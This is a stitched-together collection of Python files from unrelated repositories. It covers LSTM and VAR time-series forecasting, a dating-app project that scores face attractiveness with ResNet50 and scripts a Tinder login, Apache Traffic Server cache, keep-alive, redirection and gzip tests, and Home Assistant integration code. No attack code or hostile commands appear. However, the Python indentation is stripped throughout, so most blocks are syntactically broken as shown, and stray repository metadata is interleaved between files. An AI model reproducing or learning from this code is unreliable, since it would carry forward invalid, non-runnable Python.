inv_yhat = scaler.inverse_transform(inv_yhat)
inv_yhat = inv_yhat[:,0]
# invert scaling for actual
test_y = test_y.reshape((len(test_y), 1))
inv_y = concatenate((test_y, test_X[:, 1:]), axis=1)
inv_y = scaler.inverse_transform(inv_y)
inv_y = inv_y[:,0]
# calculate RMSE
rmse = sqrt(mean_squared_error(inv_y, inv_yhat))
print('Test RMSE: %.3f' % rmse)
```
#### File: JPDucky/Time-Series-Methods-Research/multivlstm with lag (stock).py
```python
from math import sqrt
from numpy import concatenate
from matplotlib import pyplot as plt
from pandas import read_csv
from pandas import DataFrame
from pandas import concat
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import mean_squared_error
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
import numpy as np
import seaborn as sns
import pandas as pd
import matplotlib
matplotlib.use('GTKAgg')
# convert series to supervised learning
def series_to_supervised(data, n_in=1, n_out=1, dropnan=True):
n_vars = 1 if type(data) is list else data.shape[1] # create var n_vars, set number of variables to that in array
df = DataFrame(data)
cols, names = list(), list()
# input sequence (t-n, ... t-1)
for i in range(n_in, 0, -1):
cols.append(df.shift(i))
names += [('var%d(t-%d)' % (j+1, i)) for j in range(n_vars)]
# forecast sequence (t, t+1, ... t+n)
for i in range(0, n_out):
cols.append(df.shift(-i))
if i == 0:
names += [('var%d(t)' % (j+1)) for j in range(n_vars)]
else:
names += [('var%d(t+%d)' % (j+1, i)) for j in range(n_vars)]
# put it all together
agg = concat(cols, axis=1)
agg.columns = names
# drop rows with NaN values
if dropnan:
agg.dropna(inplace=True)
return agg
##Create a differenced dataset inverse =============== reverse the function
#def difference(dataset, interval=1):
# diff = list()
# for i in range(interval, len(dataset)):
# value = dataset[i] - dataset[i - interval]
# diff.append(value)
# return dataset1(diff)
#
##Invert differenced value
#def inverse_difference(history, yhat, interval=1):
# return yhat + history[-interval]
# load dataset
dataframe = read_csv('C:\\Users\\jpdub\\Documents\\School\\PETE 4998\\IMMU.csv', header=0, index_col=0)
#print(dataframe.head(5))
#dataset1 = dataframe[['cum_oil_prod', 'cum_gas_prod', 'cum_water_prod', 'cum_water_inj']]
dataset1 = dataframe#[['date', 'open', 'high', 'low', 'close', 'adj close', 'volume']] #import all columns for stock
var = dataframe[['High']]
#print(dataset1.shape) #(376, 4)
values = dataset1.values #[:374]
#print(values[:5])
#print(values.shape)
#dataset.tail(30)
# integer encode direction
#encoder = LabelEncoder()
#values[:,3] = encoder.fit_transform(values[:,3])
#print(values[:5])
#print(values.shape) #(376, 4)
# ensure all data is float
values = values.astype('float32')
print(values.shape)
# normalize features
scaler = MinMaxScaler(feature_range=(0, 1))
scaled = scaler.fit_transform(values)
#print(scaled.shape) #(376, 4)
length = np.size(dataset1, axis=1)
#length = length - 1
#Specify number of lags
n_lag= 50
n_features = length
# frame as supervised learning
reframed = series_to_supervised(scaled, n_lag, 1)
#print(reframed.shape) #(375, 8)
#print(reframed.columns)
# drop columns we don't want to predict
reframed.drop(reframed.columns[[6, 8, 9, 10, 11]], axis=1, inplace=True)
#print(reframed.shape) #(375, 5)
#print(reframed) #yup all 5 are there, dunno why reframed shape is 8{[?]} == its the (t-1) variables lol
# split into train and test sets
values1 = reframed.values
n_train = int(values1.shape[0]*0.6)
train = values1[:n_train, :]
test = values1[n_train:, :]
# split into input and outputs
n_obs = n_lag * n_features
train_X, train_y = train[:, :n_obs], train[:, -n_features]
test_X, test_y = test[:, :n_obs], test[:, -n_features]
# reshape input to be 3D [samples, timesteps, features]
train_X = train_X.reshape((train_X.shape[0], n_lag, n_features))
test_X = test_X.reshape((test_X.shape[0], n_lag, n_features))
print(train_X.shape, train_y.shape, test_X.shape, test_y.shape)
# hyperparameters
nodes = 29
#print(train_X.shape[])
#print(train_X.shape) #(250,3) [0]= 250 , [1]= 3
#input_shape = (train_X.shape[1], train_X.shape[2])
#print(input_shape) #(1, 6)
# design network
model = Sequential() # ( 1 , 6 )
model.add(LSTM(nodes, input_shape=(train_X.shape[1], train_X.shape[2])))
model.add(Dense(1))
model.compile(loss='msle', optimizer='adam', metrics=['accuracy'])
# fit network
history = model.fit(train_X, train_y, epochs=1000, batch_size=64, validation_data=(test_X, test_y), verbose=2, shuffle=False)
#print(len(history.history))
# plot history
plt.plot(history.history['loss'], label='train')
plt.plot(history.history['val_loss'], label='test')
plt.legend()
plt.show()
# make a prediction
testPredict = model.predict(test_X) #generates output predictions for the input samples
trainPredict = model.predict(train_X)
#print('test predict')
#print(testPredict.shape) #(125, 1)
#print(test_X.shape)
test_X = test_X.reshape((test_X.shape[0], n_lag*n_features))
train_X = train_X.reshape((train_X.shape[0], n_lag*n_features))
#print('testx')
#print(test_X.shape) #(125, 5)
# invert scaling for forecast
inv_testPredict = concatenate((testPredict, test_X[:, -5:]), axis=1) #knocks off the first column and sticks the two variables together in the same array
inv_trainPredict = concatenate((trainPredict, train_X[:, -5:]), axis=1)
#print('tpd')
#print(inv_testPredict.shape)
#print(inv_testPredict.shape) #(125, 5)
inv_testPredict = scaler.inverse_transform(inv_testPredict)
inv_testPredict = inv_testPredict[:,0]
inv_trainPredict = scaler.inverse_transform(inv_trainPredict)
inv_trainPredict = inv_trainPredict[:,0]
#print(inv_testPredict)
# invert scaling for actual
test_y = test_y.reshape((len(test_y), 1))
inv_ytest = concatenate((test_y, test_X[:, -5:]), axis=1)
inv_ytest = scaler.inverse_transform(inv_ytest)
inv_ytest = inv_ytest[:,0]
print(train_y.shape)
train_y = train_y.reshape((len(train_y), 1))
inv_ytrain = concatenate((train_y, train_X[:, -5:]), axis=1)
inv_ytrain = scaler.inverse_transform(inv_ytrain)
inv_ytrain = inv_ytrain[:,0]
# calculate RMSE
rmse = sqrt(mean_squared_error(inv_ytest, inv_testPredict))
print('Test RMSE: %.3f' % rmse)
print(inv_ytest[-1])
#Shift the plot for n_lag
pad = np.arange(n_lag)
for i in pad[0:n_lag]:
pad[i] = 0
#print(pad)
#print(pad.shape)
#pad = pad.reshape(pad(n_lag), (len(n_lag)))
#put the predicted train and test datasets together
predicted_vals = concatenate((pad, inv_ytrain, inv_ytest), axis=0)
#plt.figure(figsize=(20,10))
plt.xlabel('Time')
plt.ylabel('Price')
plt.plot(predicted_vals, 'r')
#print(predicted_vals.shape)
#print(var.shape)
plt.plot(var, 'g')#need to get in inverse--> done
#print(max(predicted_vals))
#print(min(predicted_vals))
print('Predicted Max: %.3f' % predicted_vals[-1])
```
#### File: JPDucky/Time-Series-Methods-Research/VAR2.py
```python
import numpy as np
import pandas as pd
import statsmodels.api as sm
from statsmodels.tsa.api import VAR
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import mean_squared_error
## convert series to supervised learning
#def series_to_supervised(data, n_in=1, n_out=1, dropnan=True):
# n_vars = 1 if type(data) is list else data.shape[1]
# df = DataFrame(data)
# cols, names = list(), list()
# # input sequence (t-n, ... t-1)
# for i in range(n_in, 0, -1):
# cols.append(df.shift(i))
# names += [('var%d(t-%d)' % (j+1, i)) for j in range(n_vars)]
# # forecast sequence (t, t+1, ... t+n)
# for i in range(0, n_out):
# cols.append(df.shift(-i))
# if i == 0:
# names += [('var%d(t)' % (j+1)) for j in range(n_vars)]
# else:
# names += [('var%d(t+%d)' % (j+1, i)) for j in range(n_vars)]
# # put it all together
# agg = concat(cols, axis=1)
# agg.columns = names
# # drop rows with NaN values
# if dropnan:
# agg.dropna(inplace=True)
# return agg
df = pd.read_csv("red_river_b_datacum.csv", header=0, index_col=0) #parse_dates=[['Date']])
df_new = df[['cum_oil_prod', 'cum_gas_prod', 'cum_water_prod', 'cum_water_inj', 'sum_max_pres']]#, 'gas_prod', 'water_prod', 'water_cut', 'sum_tot_inj', 'days_inj', 'sum_inj_rate', 'thick', 'phi', 'k', 'compr', 'Swi', 'oil_dens', 'pres_aband', 'viscos_bp', 'fvf', 'press_init']]
print(df_new.head())
df_new = df_new[:350]
data = df_new
#dataset.columns = ['sum_tot_inj', 'days_inj', 'sum_inj_rate', 'sum_inj_pres', 'sum_max_pres', 'oil_prod', 'gas_prod', 'water_prod', 'water_cut', 'cum_water_inj', 'cum_oil_prod', 'cum_gas_prod', 'cum_water_prod', 'thick', 'phi', 'k', 'compr', 'Swi', 'oil_dens', 'pres_aband', 'viscos_bp', 'fvf', 'press_init']
#values = data.values
## integer encode direction
#encoder = LabelEncoder()
#values[:,3] = encoder.fit_transform(values[:,3])
## ensure all data is float
#values = values.astype('float32')
## normalize features
#scaler = MinMaxScaler(feature_range=(0, 1))
#scaled = scaler.fit_transform(values)
## frame as supervised learning
#reframed = series_to_supervised(scaled, 1, 1)
#
#mdata = sm.datasets.macrodata.load_pandas().data
model = VAR(data)
results = model.fit()
print(results.summary())
#results.plot()
model.select_order(20)
results = model.fit(maxlags=20, ic='aic')
lag_order = results.k_ar
results.forecast(data.values[-lag_order:],6)
results.plot_forecast(10)
#
#irf = results.irf(10)
#irf.plot(orth=False)
#
#irf.plot(impulse='cum_oil_prod')
``` |
{
"source": "Jpe230/DDatingApp",
"score": 2
} |
#### File: DDatingApp/neuralnetwork/test.py
```python
import tensorflow as tf
import pickle
import numpy as np
import cv2
import os
from keras.applications import resnet50
from keras.models import Sequential
from keras.applications.resnet50 import ResNet50
from keras.layers import Dense
from keras.optimizers import Adam
from keras.layers import Dropout
# User-defined const
import const
# Needs to be here if using NVIDIA GPU, otherwise model wouldnt load
physical_devices = tf.config.list_physical_devices('GPU')
tf.config.experimental.set_memory_growth(physical_devices[0], True)
# Load ResNet50 as our base
resnet = ResNet50(include_top=False, pooling='avg')
model = Sequential()
model.add(resnet)
model.add(Dense(5, activation='softmax'))
model.layers[0].trainable = False
# Load our trained weights
model.load_weights(const.TRAINEDMODEL_FILE)
image_data = []
attract_data = []
PC = []
score = []
predScore = []
def detectFace(detector, image_path, image_name):
imgAbsPath = image_path + image_name
img = cv2.imread(imgAbsPath)
if img.ndim == 3:
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
else:
gray = img
w = img.shape[1]
faces = detector.detectMultiScale(gray, 1.1, 5, 0, (w//2, w//2))
resized_im = 0
if len(faces) == 1:
face = faces[0]
croped_im = img[face[1]:face[1]+face[3], face[0]:face[0]+face[2], :]
resized_im = cv2.resize(croped_im, (224, 224))
else:
print(image_name+" error " + str(len(faces)))
return resized_im
# Load CV2 face detector
face_cascade = cv2.CascadeClassifier(const.MODEL_PATH)
# Load test data
test_data = pickle.load(open(const.TESTING_FILE, 'rb'))
data_len = test_data.__len__()
test_label_dist = train_Y = [
x for x in test_data[0:data_len]]
# Test the data
for i in range(0, data_len):
label_distribution = test_label_dist[i]
image = label_distribution[1]
print("dist:" + str(label_distribution[0]))
label_score = 1*label_distribution[2][0] + 2*label_distribution[2][1] + 3 * \
label_distribution[2][2] + 4 * \
label_distribution[2][3] + 5*label_distribution[2][4]
print("score:%1.2f " % (label_score))
score.append(label_score)
# Predict with our model
pred = model.predict(np.expand_dims(image, axis=0))
ldList = pred[0]
pred = 1 * ldList[0] + 2 * ldList[1] + 3 * \
ldList[2] + 4 * ldList[3] + 5 * ldList[4]
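    # The scalar rating is the expected value of the predicted 1-5 distribution
    # (each rating times its predicted probability), mirroring label_score above.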
print("prediction:" + str(pred))
predScore.append(pred)
# Get Correletion
y = np.asarray(score)
pred_y = np.asarray(predScore)
corr = np.corrcoef(y, pred_y)[0, 1]
# 1 = PERFECT
# 0.50 - .99 = High
# 0.30 - .49 = Moderate
# 0.00 - .29 = Low
# 0 = No correlation
# Tested correlation was around .0.46
print('PC (Pearson correlation) mean = %1.2f ' % (corr))
```
#### File: tinder/login/tinderlogin.py
```python
from time import sleep
from tinder.login.smslogin import SMSLogin
from selenium.common.exceptions import NoSuchElementException
class TinderLogin:
def __init__(self, driver):
self.driver = driver
self.type = type
self.__isLogged = False
self.methodLogin = SMSLogin(driver)
def logIn(self):
driver = self.driver
self.methodLogin.logIn()
if self.check_exists_by_xpath_element('/html/body/div[1]/div/div[1]/div/aside/div/a/h2'):
sleep(1)
self.handle_popup()
self.__isLogged = True
else:
self.__isLogged = False
def handle_popup(self):
driver = self.driver
# You received a like
if self.check_exists_by_xpath_element('/html/body/div[2]/div/div/div/div[3]/button[2]'):
button = driver.find_element_by_xpath('/html/body/div[2]/div/div/div/div[3]/button[2]')
button.click()
def isLogged(self):
return self.__isLogged
def check_exists_by_xpath_element(self, xpath):
driver = self.driver
sleep(2)
try:
element = driver.find_element_by_xpath(xpath)
except NoSuchElementException:
return False
return True
``` |
{
"source": "jpeach/trafficserver",
"score": 2
} |
#### File: tsqa/tests/test_cache_generation.py
```python
import os
import subprocess
import logging
import requests
import random
import uuid
import time
import helpers
import tsqa.test_cases
import tsqa.utils
log = logging.getLogger(__name__)
class TestCacheGeneration(helpers.EnvironmentCase):
'''
Test the cache object generation ID.
'''
def _fetch(self, path):
url = 'http://127.0.0.1:{}/{}'.format(
self.configs['records.config']['CONFIG']['proxy.config.http.server_ports'],
path
)
log.debug('get {}'.format(url))
return requests.get(url, headers={'x-debug': 'x-cache,x-cache-key,via,x-cache-generation'})
def _dump(self, response):
log.info('HTTP response {}'.format(response.status_code))
for k, v in response.headers.items():
log.info(' {}: {}'.format(k, v))
def _ctl(self, *args):
cmd = [os.path.join(self.environment.layout.bindir, 'traffic_ctl')] + list(args)
out, _ = tsqa.utils.run_sync_command(
cmd,
env=self.environment.shell_env, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
)
return out
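    # For example, self._ctl('config', 'set', 'proxy.config.http.cache.generation', '5')
    # shells out to: <bindir>/traffic_ctl config set proxy.config.http.cache.generation 5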
@classmethod
def setUpEnv(cls, env):
cls.configs['plugin.config'].add_line('xdebug.so')
cls.configs['remap.config'].add_line(
'map /default/ http://127.0.0.1/ @plugin=generator.so'
)
cls.configs['remap.config'].add_line(
'map /generation1/ http://127.0.0.1/' +
' @plugin=conf_remap.so @pparam=proxy.config.http.cache.generation=1' +
' @plugin=generator.so'
)
cls.configs['remap.config'].add_line(
'map /generation2/ http://127.0.0.1/' +
' @plugin=conf_remap.so @pparam=proxy.config.http.cache.generation=2' +
' @plugin=generator.so'
)
# Start with cache generation turned off
cls.configs['records.config']['CONFIG']['proxy.config.http.cache.generation'] = -1
# Wait for the cache so we don't race client requests against it.
cls.configs['records.config']['CONFIG']['proxy.config.http.wait_for_cache'] = 1
cls.configs['records.config']['CONFIG']['proxy.config.config_update_interval_ms'] = 1
def test_generations_are_disjoint(self):
"""Test that the same URL path in different cache generations creates disjoint objects"""
objectid = uuid.uuid4()
# First touch is a MISS.
ret = self._fetch('default/cache/10/{}'.format(objectid))
self.assertEqual(ret.status_code, 200)
self.assertEqual(ret.headers['x-cache'], 'miss', msg=ret)
self.assertEqual(ret.headers['x-cache-generation'], '-1')
# Same URL in generation 1 is a MISS.
ret = self._fetch('generation1/cache/10/{}'.format(objectid))
self.assertEqual(ret.status_code, 200)
self.assertEqual(ret.headers['x-cache'], 'miss')
self.assertEqual(ret.headers['x-cache-generation'], '1')
# Same URL in generation 2 is still a MISS.
ret = self._fetch('generation2/cache/10/{}'.format(objectid))
self.assertEqual(ret.status_code, 200)
self.assertEqual(ret.headers['x-cache'], 'miss')
self.assertEqual(ret.headers['x-cache-generation'], '2')
# Second touch is a HIT.
ret = self._fetch('default/cache/10/{}'.format(objectid))
self.assertEqual(ret.status_code, 200)
self.assertEqual(ret.headers['x-cache'], 'hit-fresh', msg=ret.headers['x-cache'])
self.assertEqual(ret.headers['x-cache-generation'], '-1')
def test_online_cache_clear(self):
"""Test that incrementing the cache generation acts like a cache clear"""
objectid = uuid.uuid4()
# First touch is a MISS.
ret = self._fetch('default/cache/10/{}'.format(objectid))
self.assertEqual(ret.status_code, 200)
self.assertEqual(ret.headers['x-cache'], 'miss')
# Second touch is a HIT.
ret = self._fetch('default/cache/10/{}'.format(objectid))
self.assertEqual(ret.status_code, 200)
self.assertEqual(ret.headers['x-cache'], 'hit-fresh')
# Now update the generation number.
timeout = float(self._ctl('config', 'get', 'proxy.config.config_update_interval_ms').split(' ')[-1])
generation = random.randrange(65000)
gencount = 0
self._ctl('config', 'set', 'proxy.config.http.cache.generation', str(generation))
self._ctl('config', 'reload')
for _ in xrange(5):
if gencount == 0:
log.debug('waiting {} secs for the config to update'.format(timeout / 1000))
time.sleep(timeout / 1000)
ret = self._fetch('default/cache/10/{}'.format(objectid))
self.assertEqual(ret.status_code, 200)
if ret.headers['x-cache-generation'] == str(generation):
if gencount == 0:
# First time we see the new generation, it should be a miss.
self.assertEqual(ret.headers['x-cache'], 'miss')
else:
                    # Subsequent fetches at the new generation should now be cache hits.
self.assertEqual(ret.headers['x-cache'], 'hit-fresh')
else:
# Config has not updated, so it should be a hit.
self.assertEqual(ret.headers['x-cache'], 'hit-fresh')
self.assertEqual(ret.headers['x-cache-generation'], '-1')
gencount = gencount + 1
self.assertNotEqual(gencount, 0, msg='proxy.config.http.cache.generation never updated')
```
#### File: tsqa/tests/test_origin_min_keep_alive_connection.py
```python
import time
import logging
import uuid
import socket
import requests
import tsqa.test_cases
import tsqa.utils
import tsqa.endpoint
import helpers
import SocketServer
log = logging.getLogger(__name__)
class KAHandler(SocketServer.BaseRequestHandler):
"""
    A request handler that answers every request with a per-connection UUID,
    so the test can tell whether successive client requests reused the same
    keep-alive connection to this origin server.
"""
def handle(self):
# Receive the data in small chunks and retransmit it
conn_id = uuid.uuid4().hex
start = time.time()
while True:
data = self.request.recv(4096).strip()
if data:
log.info('Sending data back to the client: {uid}'.format(uid=conn_id))
else:
log.info('Client disconnected: {timeout}seconds'.format(timeout=time.time() - start))
break
body = conn_id
time.sleep(1)
resp = ('HTTP/1.1 200 OK\r\n'
'Content-Length: {content_length}\r\n'
'Content-Type: text/html; charset=UTF-8\r\n'
'Connection: keep-alive\r\n'
'\r\n'
'{body}'.format(content_length=len(body), body=body))
self.request.sendall(resp)
class TestKeepAlive_Origin_Min_connections(helpers.EnvironmentCase):
@classmethod
def setUpEnv(cls, env):
cls.traffic_server_host = '127.0.0.1'
cls.traffic_server_port = int(cls.configs['records.config']['CONFIG']['proxy.config.http.server_ports'])
cls.socket_server_port = int(tsqa.utils.bind_unused_port()[1])
log.info("socket_server_port = %d" % (cls.socket_server_port))
cls.server = tsqa.endpoint.SocketServerDaemon(KAHandler, port=cls.socket_server_port)
cls.server.start()
cls.server.ready.wait()
cls.configs['remap.config'].add_line('map / http://127.0.0.1:{0}'.format(cls.socket_server_port))
cls.origin_keep_alive_timeout = 1
cls.configs['records.config']['CONFIG'].update({
'proxy.config.http.origin_min_keep_alive_connections': 1,
'proxy.config.http.keep_alive_enabled_out': 1,
'proxy.config.http.keep_alive_no_activity_timeout_out': cls.origin_keep_alive_timeout,
'proxy.config.exec_thread.limit': 1,
'proxy.config.exec_thread.autoconfig': 0,
})
def test_origin_min_connection(self):
response_uuids = []
# make the request N times, ensure that they are on the same connection
for _ in xrange(0, 3):
ret = requests.get('http://{0}:{1}/'.format(self.traffic_server_host, self.traffic_server_port))
response_uuids.append(ret.text)
self.assertEqual(1, len(set(response_uuids)))
# sleep for a time greater than the keepalive timeout and ensure its the same connection
time.sleep(self.origin_keep_alive_timeout * 2)
ret = requests.get('http://{0}:{1}/'.format(self.traffic_server_host, self.traffic_server_port))
self.assertEqual(ret.text, response_uuids[0])
```
#### File: tsqa/tests/test_redirection.py
```python
import requests
import helpers
import tsqa.test_cases
import tsqa.utils
import tsqa.endpoint
class TestRedirection(helpers.EnvironmentCase, tsqa.test_cases.HTTPBinCase):
@classmethod
def setUpEnv(cls, env):
cls.configs['records.config']['CONFIG'].update({
'proxy.config.http.redirection_enabled': 1,
'proxy.config.http.number_of_redirections': 10
})
cls.configs['remap.config'].add_line('map / http://127.0.0.1:{0}'.format(cls.http_endpoint.address[1]))
def test_redirection(self):
server_ports = self.configs['records.config']['CONFIG']['proxy.config.http.server_ports']
# By default Requests will perform location redirection
# Disable redirection handling with the allow_redirects parameter
r = requests.get('http://127.0.0.1:{0}/redirect/9'.format(server_ports), allow_redirects=False)
self.assertEqual(r.status_code, 200)
r = requests.get('http://127.0.0.1:{0}/redirect/10'.format(server_ports), allow_redirects=False)
self.assertEqual(r.status_code, 302)
```
#### File: gzip/tests/test_gzip.py
```python
import requests
import logging
import random, string
import tsqa.test_cases
import tsqa.utils
import tsqa.endpoint
import os
origin_content_length = 0
log = logging.getLogger(__name__)
#Test positive cases of remap gzip plugin
gzip_remap_bench = [
# Test gzip
{ "args": "@pparam=gzip1.config",
"files": [("gzip1.config", "enabled true\nremove-accept-encoding true\ncache false\ncompressible-content-type text/*\n")
],
},
{ "args": "@pparam=gzip2.config",
"files": [("gzip2.config", "enabled true\nremove-accept-encoding false\ncache false\ncompressible-content-type text/*\n")
],
},
{ "args": "@pparam=gzip3.config",
"files": [("gzip3.config", "enabled true\nremove-accept-encoding true\ncache true\ncompressible-content-type text/*\n")
],
},
{ "args": "@pparam=gzip4.config",
"files": [("gzip4.config", "enabled true\nremove-accept-encoding true\ncache true\ncompressible-content-type text/*\nflush true\n")
],
},
{ "args": "@pparam=gzip5.config",
"files": [("gzip5.config", "enabled true\nremove-accept-encoding true\ncache true\ncompressible-content-type text/*\nflush false\n")
],
},
]
#Test negative cases of remap gzip plugin
gzip_remap_negative_bench = [
#Test when gzip is disabled
{ "args": "@pparam=gzip_negative1.config",
"files": [("gzip_negative1.config", "enabled false\nremove-accept-encoding true\ncache false\ncompressible-content-type text/*\n")
],
},
#Test when compressible content doesn't match
{ "args": "@pparam=gzip_negative2.config",
"files": [("gzip_negative2.config", "enabled true\nremove-accept-encoding true\ncache false\ncompressible-content-type !text/*\n")
],
},
#Test when disallow is configured to match some pattern
{ "args": "@pparam=gzip_negative3.config",
"files": [("gzip_negative3.config", "enabled true\nremove-accept-encoding true\ncache false\ncompressible-content-type text/*\ndisallow *test*\n")
],
},
]
#Test global gzip plugin
gzip_global_bench = [
{ "args": "gzip_global1.config",
"files": [("gzip_global1.config", "enabled true\nremove-accept-encoding true\ncache true\ncompressible-content-type text/*\n")
],
},
]
#Set up an origin server which returns random string.
def handler(request):
global origin_content_length
rand_string = ''.join(random.choice(string.lowercase) for i in range(500))
origin_content_length = len(rand_string)
return rand_string
def create_config_files(env, test):
# Create gzip config files.
for file in test['files']:
filename = file[0]
content = file[1]
path = os.path.join(env.layout.prefix, 'etc/trafficserver', filename);
with open(path, 'w') as fh:
fh.write(content)
class StaticEnvironmentCase(tsqa.test_cases.EnvironmentCase):
@classmethod
def getEnv(cls):
#layout = tsqa.environment.Layout('/opt/gitlab-gzip')
layout = tsqa.environment.Layout('/opt/apache/trafficserver.TS-4147')
env = tsqa.environment.Environment()
env.clone(layout=layout)
return env
#Test gzip remap plugin
class TestGzipRemapPlugin(tsqa.test_cases.DynamicHTTPEndpointCase, StaticEnvironmentCase):
@classmethod
def setUpEnv(cls, env):
cls.configs['plugin.config'].add_line('xdebug.so')
cls.configs['records.config']['CONFIG'].update({
'proxy.config.diags.debug.enabled': 1,
            'proxy.config.diags.debug.tags': 'gzip.*',
'proxy.config.url_remap.pristine_host_hdr': 1,})
cls.http_endpoint.add_handler('/path/to/object', handler)
def add_remap_rule(remap_prefix, remap_index, test):
host = 'test_{0}_{1}.example.com'.format(remap_prefix, remap_index)
port = cls.configs['records.config']['CONFIG']['proxy.config.http.server_ports']
args = test['args']
remap_rule = 'map http://{0}:{1} http://127.0.0.1:{2} @plugin=gzip.so {3}'.format(host, port, cls.http_endpoint.address[1], args)
log.info(' {0}'.format(remap_rule))
cls.configs['remap.config'].add_line(remap_rule)
# Prepare gzip tests related remap rules.
i = 0
for test in gzip_remap_bench:
add_remap_rule("gzip", i, test)
create_config_files(env, test)
i+=1
#Prepare negative gzip tests related remap rules.
i = 0
for test in gzip_remap_negative_bench:
add_remap_rule("gzip_negative", i, test)
create_config_files(env, test)
i+=1
def send_request(self,remap_prefix, remap_index):
host = 'test_{0}_{1}.example.com'.format( remap_prefix, remap_index)
port = self.configs['records.config']['CONFIG']['proxy.config.http.server_ports']
url = 'http://127.0.0.1:{0}/path/to/object'.format(port)
log.info('host is {0}, port is {1}, url is {2}'.format(host, port, url))
s = requests.Session()
s.headers.update({'Host': '{0}:{1}'.format(host, port)})
        s.headers.update({'Accept-Encoding': 'gzip'})
response = s.get(url)
log.info('Response headers obtained: {0}'.format(response.headers))
return response
def send_gzip_request(self, remap_prefix, remap_index):
'''
Sends a gzip request to the traffic server
'''
response = self.send_request(remap_prefix, remap_index)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.headers['Content-Encoding'], 'gzip')
self.assertLess(int(response.headers['Content-Length']), int(origin_content_length))
def send_gzip_request_negative(self, remap_prefix, remap_index):
'''
Sends a gzip request to the traffic server
'''
response = self.send_request(remap_prefix, remap_index)
self.assertEqual(response.status_code, 200)
self.assertEqual(int(response.headers['Content-Length']), int(origin_content_length))
def test_gzip_remap_plugin(self):
i = 0
for test in gzip_remap_bench:
self.send_gzip_request('gzip', i)
i += 1
i = 0
for test in gzip_remap_negative_bench:
self.send_gzip_request_negative('gzip_negative', i)
i += 1
#Test gzip global plugin
class TestGzipGlobalPlugin(tsqa.test_cases.DynamicHTTPEndpointCase, StaticEnvironmentCase):
@classmethod
def setUpEnv(cls, env):
cls.configs['plugin.config'].add_line('xdebug.so')
cls.configs['records.config']['CONFIG'].update({
'proxy.config.diags.debug.enabled': 1,
'proxy.config.diags.debug.tags': 'gzip.*',
'proxy.config.url_remap.pristine_host_hdr': 1,})
cls.http_endpoint.add_handler('/path/to/object', handler)
def add_remap_rule(remap_prefix, remap_index):
host = 'test_{0}_{1}.example.com'.format(remap_prefix, remap_index)
port = cls.configs['records.config']['CONFIG']['proxy.config.http.server_ports']
remap_rule = 'map http://{0}:{1} http://127.0.0.1:{2}'.format(host, port, cls.http_endpoint.address[1])
log.info(' {0}'.format(remap_rule))
cls.configs['remap.config'].add_line(remap_rule)
def add_global_plugin_rule(test):
args = test['args']
plugin_rule = 'gzip.so {0}'.format(args)
log.info(' {0}'.format(plugin_rule))
cls.configs['plugin.config'].add_line(plugin_rule)
# Prepare gzip plugin rules
i = 0
for test in gzip_global_bench:
add_remap_rule("gzip_global",i)
add_global_plugin_rule(test)
create_config_files(env, test)
i+=1
def send_request(self,remap_prefix, remap_index):
host = 'test_{0}_{1}.example.com'.format( remap_prefix, remap_index)
port = self.configs['records.config']['CONFIG']['proxy.config.http.server_ports']
url = 'http://127.0.0.1:{0}/path/to/object'.format(port)
log.info('host is {0}, port is {1}, url is {2}'.format(host, port, url))
s = requests.Session()
s.headers.update({'Host': '{0}:{1}'.format(host, port)})
        s.headers.update({'Accept-Encoding': 'gzip'})
response = s.get(url)
log.info('Response headers obtained: {0}'.format(response.headers))
return response
def send_global_gzip_request(self, remap_prefix, remap_index):
'''
Sends a gzip request to the traffic server
'''
response = self.send_request(remap_prefix, remap_index)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.headers['Content-Encoding'], 'gzip')
self.assertLess(int(response.headers['Content-Length']), int(origin_content_length))
def test_gzip_global_plugin(self):
i = 0
for test in gzip_global_bench:
self.send_global_gzip_request("gzip_global", i)
i += 1
``` |
{
"source": "jpearce73/core",
"score": 2
} |
#### File: components/airvisual/diagnostics.py
```python
from __future__ import annotations
from types import MappingProxyType
from typing import Any
from homeassistant.components.diagnostics import REDACTED
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_API_KEY, CONF_LATITUDE, CONF_LONGITUDE, CONF_STATE
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator
from .const import CONF_CITY, CONF_COUNTRY, DOMAIN
CONF_COORDINATES = "coordinates"
@callback
def _async_redact_data(data: MappingProxyType | dict) -> dict[str, Any]:
"""Redact sensitive data in a dict."""
redacted = {**data}
for key, value in redacted.items():
if key in (
CONF_API_KEY,
CONF_CITY,
CONF_COORDINATES,
CONF_COUNTRY,
CONF_LATITUDE,
CONF_LONGITUDE,
CONF_STATE,
):
redacted[key] = REDACTED
elif isinstance(value, dict):
redacted[key] = _async_redact_data(value)
return redacted
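
# Illustrative example (added): _async_redact_data({"api_key": "abc", "city": "Recife"})
# returns both values replaced with the diagnostics REDACTED marker.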
async def async_get_config_entry_diagnostics(
hass: HomeAssistant, entry: ConfigEntry
) -> dict[str, Any]:
"""Return diagnostics for a config entry."""
coordinator: DataUpdateCoordinator = hass.data[DOMAIN][entry.entry_id]
return {
"entry": {
"title": entry.title,
"data": _async_redact_data(entry.data),
"options": _async_redact_data(entry.options),
},
"data": _async_redact_data(coordinator.data["data"]),
}
```
#### File: components/devolo_home_control/siren.py
```python
from typing import Any
from devolo_home_control_api.devices.zwave import Zwave
from devolo_home_control_api.homecontrol import HomeControl
from homeassistant.components.siren import (
ATTR_TONE,
SUPPORT_TONES,
SUPPORT_TURN_OFF,
SUPPORT_TURN_ON,
SirenEntity,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from .const import DOMAIN
from .devolo_multi_level_switch import DevoloMultiLevelSwitchDeviceEntity
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Get all binary sensor and multi level sensor devices and setup them via config entry."""
entities = []
for gateway in hass.data[DOMAIN][entry.entry_id]["gateways"]:
for device in gateway.multi_level_switch_devices:
for multi_level_switch in device.multi_level_switch_property:
if multi_level_switch.startswith("devolo.SirenMultiLevelSwitch"):
entities.append(
DevoloSirenDeviceEntity(
homecontrol=gateway,
device_instance=device,
element_uid=multi_level_switch,
)
)
async_add_entities(entities, False)
